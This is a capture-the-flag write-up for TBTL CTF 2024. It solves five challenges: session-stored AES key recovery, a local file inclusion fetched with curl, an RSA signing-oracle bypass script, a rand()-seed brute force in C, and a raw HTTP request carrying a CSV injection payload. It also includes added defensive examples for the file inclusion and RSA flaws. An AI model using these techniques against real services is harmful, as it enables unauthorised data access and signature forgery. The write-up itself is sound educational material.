# TBTL CTF 2024

Challenge archive: <https://github.com/blockhousetech/TBTL-CTF/tree/master/2024/>

| Challenge                                     | Category | Total Solved |
| --------------------------------------------- | -------- | ------------ |
| [Butterfly](#butterfly)                       | Web      |              |
| [Talk to you](#talk-to-you)                   | Web      |              |
| [Wikipedia signatures](#wikipedia-signatures) | Crypto   |              |
| [Flagcheck](#flagcheck)                       | Reverse  |              |
| [Rnd For Data Science](#rnd-for-data-science) | Web      |              |

## Butterfly

The encrypted flag is stored in IndexedDB: `U2FsdGVkX19wWL7itIL7TZcLTP/e1ulrZolI9AHTA8OBGOCodbZKdOxPF41rGV9C+X7PZPt9ISJKQMpTl+Fwew==`

`{"code":"CryptoJS.AES.decrypt(CIPHERTEXT, KEY).toString(CryptoJS.enc.Utf8)"}` (we get this from the session). We assume the flag is decrypted with this function, so all that is left is to find the secret.

The secret is also in the session, so we use it directly:

```javascript
CryptoJS.AES.decrypt('U2FsdGVkX19wWL7itIL7TZcLTP/e1ulrZolI9AHTA8OBGOCodbZKdOxPF41rGV9C+X7PZPt9ISJKQMpTl+Fwew==', 'secret key is very secure').toString(CryptoJS.enc.Utf8)
```

Flag: TBTL{th15\_1S\_n0t\_53CUR3\_5T0r4G3}

## Talk to you

There is an LFI in the `page` parameter. We first requested `../flag.txt`, and the site replied that the flag is in `database.sqlite`, so we changed the parameter accordingly and got the flag.

```bash
curl "https://tbtl-talk-to-you.chals.io/?page=database.sqlite" --output file
```

TBTL{4Typ1c41\_d4T4B453\_u54g3}
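Why blocking `../` alone would not have closed this endpoint, as an added example (not the challenge's source): `database.sqlite` is reachable without any traversal, so only a handler that never turns the parameter into a path keeps it private. The directory layout, the handler names and the `ALLOWED_PAGES` map are assumptions; only the `page` parameter and the two file names come from the write-up.

```python
import tempfile
from pathlib import Path


def build_site() -> Path:
    """Constructed layout: pages and database.sqlite share app/, flag.txt is one level up."""
    root = Path(tempfile.mkdtemp())
    app = root / "app"
    app.mkdir()
    (root / "flag.txt").write_text("the flag is in database.sqlite")
    (app / "home.html").write_text("<h1>home</h1>")
    (app / "database.sqlite").write_bytes(b"SQLite format 3\x00 (constructed)")
    return app


def include_naive(app: Path, page: str) -> bytes:
    """Vulnerable pattern: the parameter is joined to the base directory as-is."""
    return (app / page).read_bytes()


def include_confined(app: Path, page: str) -> bytes:
    """Stops ../ traversal, but still serves every file that lives inside app/."""
    base, target = app.resolve(), (app / page).resolve()
    if base not in target.parents:
        raise PermissionError(page)
    return target.read_bytes()


ALLOWED_PAGES = {"home": "home.html"}  # hypothetical page ids -> fixed file names


def include_allowlist(app: Path, page: str) -> bytes:
    """Hardened: the parameter only selects an entry, it never becomes a path."""
    if page not in ALLOWED_PAGES:
        raise PermissionError(page)
    return (app / ALLOWED_PAGES[page]).read_bytes()


def served(handler, app: Path, page: str) -> bool:
    """True when the handler returns file contents for this page value."""
    try:
        handler(app, page)
        return True
    except (PermissionError, FileNotFoundError):
        return False
```

Keeping the database file outside any directory the include handler can read removes the exposure even if the allowlist is later loosened.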

## Wikipedia signatures

Attacks on this kind of oracle usually rely on submitting a message that is congruent to the target modulo N.

Here, however, every payload of the form pt + a\*N is forbidden.

We can simply submit N-pt instead.

Because e is odd, (N-pt)^e = -C (mod N), where C = pt^e (mod N).

So taking -(-C) (mod N) gives us what we need, and supplying that value decrypts successfully.

```python
from Crypto.Util.number import bytes_to_long
from pwn import remote

conn = remote('0.cloud.chals.io', 31148)

# Parse the public key, which the banner prints as "(n, e)".
conn.recvuntil(b'(')

n = int(conn.recvuntil(b',').decode()[:-1])
print(n)

e = int(conn.recvuntil(b')').decode()[:-1])
print(e)

# Skip the remaining banner lines up to the menu prompt.
conn.recvline()
conn.recvline()
conn.recvline()
conn.recvline()

print(conn.recvuntil(b'> '))

TARGET = b'I challenge you to sign this message!'
pt = bytes_to_long(TARGET)

print(pt)

# N - pt is not of the filtered form pt + a*N, so option 2 accepts it.
rev_t = n - pt

payload = "2 " + str(rev_t)
print(payload)
conn.sendline(payload.encode())

res = int(conn.recvline().decode().strip("\r\n"))
print(res)

# Negate the answer modulo N to obtain the value for the target itself.
rev_res = n - res
print(rev_res)

# Submit the recovered value through option 1.
payload = "1 " + str(rev_res)
print(payload)
conn.sendline(payload.encode())
print(conn.recvall())

conn.close()
```

TBTL{r3p347\_4f73r\_m3-d16174l\_516n47ur3\_15\_n07\_3ncryp710n}
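The identity above, run against a constructed textbook-RSA key as an added example (not the challenge's code): the `pt + a*N` filter holds, the `N - pt` relation still goes through because the exponent is odd, and hashing before exponentiation breaks the relation. The primes, the two oracles and all function names are assumptions for illustration.

```python
import hashlib

# Constructed toy key: two Mersenne primes. Illustration only, not the challenge's key.
P, Q = 2**521 - 1, 2**607 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))

TARGET = b"I challenge you to sign this message!"
PT = int.from_bytes(TARGET, "big")


def raw_oracle(m: int) -> int:
    """Hypothetical textbook-RSA oracle with the filter the write-up describes."""
    if m % N == PT:                      # rejects pt + a*N for every integer a
        raise ValueError("refusing to process the target message")
    return pow(m, D, N)


def is_refused(m: int) -> bool:
    try:
        raw_oracle(m)
        return False
    except ValueError:
        return True


def relay_negated() -> int:
    """Ask for N - pt, then negate: (N - pt)^D = -(pt^D) mod N because D is odd."""
    return (N - raw_oracle(N - PT)) % N


def verify_raw(m: int, s: int) -> bool:
    return pow(s, E, N) == m % N


def digest(msg: bytes) -> int:
    return int.from_bytes(hashlib.sha256(msg).digest(), "big")


def hashed_oracle(msg: bytes) -> int:
    """Hash first, so algebraically related inputs no longer give related outputs."""
    if msg == TARGET:
        raise ValueError("refusing to process the target message")
    return pow(digest(msg), D, N)


def verify_hashed(msg: bytes, s: int) -> bool:
    return pow(s, E, N) == digest(msg)


def relay_negated_hashed() -> int:
    neg = (N - PT).to_bytes((N.bit_length() + 7) // 8, "big")
    return (N - hashed_oracle(neg)) % N
```

Hash-then-exponentiate is shown here only to break the algebraic relation; a deployed service should use a standard padded scheme such as RSASSA-PSS instead of a hand-rolled construction.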

## Flagcheck

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

unsigned char dt[] = {0x33,0x00,0x00,0x00,0x84,0x00,0x00,0x00,0x3d,0x00,0x00,0x00,0x3f,0x00,0x00,0x00,0x2a,0x00,0x00,0x00,0x93,0x00,0x00,0x00,0x7b,0x00,0x00,0x00,0x82,0x00,0x00,0x00,0x1a,0x00,0x00,0x00,0xac,0x00,0x00,0x00,0x8e,0x00,0x00,0x00,0xf4,0x00,0x00,0x00,0xb1,0x00,0x00,0x00,0xcb,0x00,0x00,0x00,0x8d,0x00,0x00,0x00,0x21,0x00,0x00,0x00,0x0e,0x00,0x00,0x00,0xb7,0x00,0x00,0x00,0x67,0x00,0x00,0x00,0x96,0x00,0x00,0x00,0x2c,0x00,0x00,0x00,0x81,0x00,0x00,0x00,0xd3,0x00,0x00,0x00,0xbc,0x00,0x00,0x00,0x29,0x00,0x00,0x00,0x6c,0x00,0x00,0x00,0x4b,0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xed,0x00,0x00,0x00,0xfd,0x00,0x00,0x00,0xee,0x00,0x00,0x00,0x56,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x52,0x00,0x00,0x00,0xd5,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x6d,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x3e,0x00,0x00,0x00,0x7a,0x00,0x00,0x00,0x1b,0x00,0x00,0x00,0x69,0x00,0x00,0x00,0x23,0x00,0x00,0x00,0x1f,0x00,0x00,0x00,0xb6,0x00,0x00,0x00,0x1d,0x00,0x00,0x00,0xbc,0x00,0x00,0x00,0x98,0x00,0x00,0x00,0xd1,0x00,0x00,0x00,0xa6,0x00,0x00,0x00,0x83,0x00,0x00,0x00,0xe9,0x00,0x00,0x00,0xeb,0x00,0x00,0x00,0x13,0x00,0x00,0x00,0x21,0x00,0x00,0x00,0x3d,0x00,0x00,0x00,0xf8,0x00,0x00,0x00,0x2b,0x00,0x00,0x00,0x79,0x00,0x00,0x00,0x53,0x00,0x00,0x00,0x4f,0x00,0x00,0x00,0xa1,0x00,0x00,0x00};

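int main() {
    /* Brute-force the one-byte seed: for each candidate, regenerate the
     * rand() keystream and XOR it with the low byte of every 32-bit entry.
     * rand() is implementation-defined, so build this against the same
     * C library as the challenge binary. */
    for (int x = 0; x < 255; x++) {
        srand(x);
        char tmp[64] = {0};
        /* dt holds 0x3f little-endian 32-bit values; only byte 0 is used. */
        for (int i = 0; i < 0x3f; i++) {
            tmp[i] = dt[i*4] ^ (rand() % 0x100);
        }
        /* The right seed yields a plaintext containing the flag prefix. */
        if (strstr(tmp, "TBTL") != NULL) {
            printf("%s\n", tmp);
            break;
        }
    }
    return 0;
}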
```

## Rnd For Data Science

CSV injection payload: `,delimiter,#` in `columnName0`, with a space (`%20`) as the `delimiter`:

```http
POST /generate HTTP/1.1
Host: tbtl-rnd-for-data-science.chals.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: https://tbtl-rnd-for-data-science.chals.io
Referer: https://tbtl-rnd-for-data-science.chals.io/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

numColumns=3&columnName0=%2cdelimiter%2c%23&columnName1=b&columnName2=c&delimiter=%20
```

TBTL{d4T4\_5c13nc3\_15\_n07\_f0r\_r0ck135}
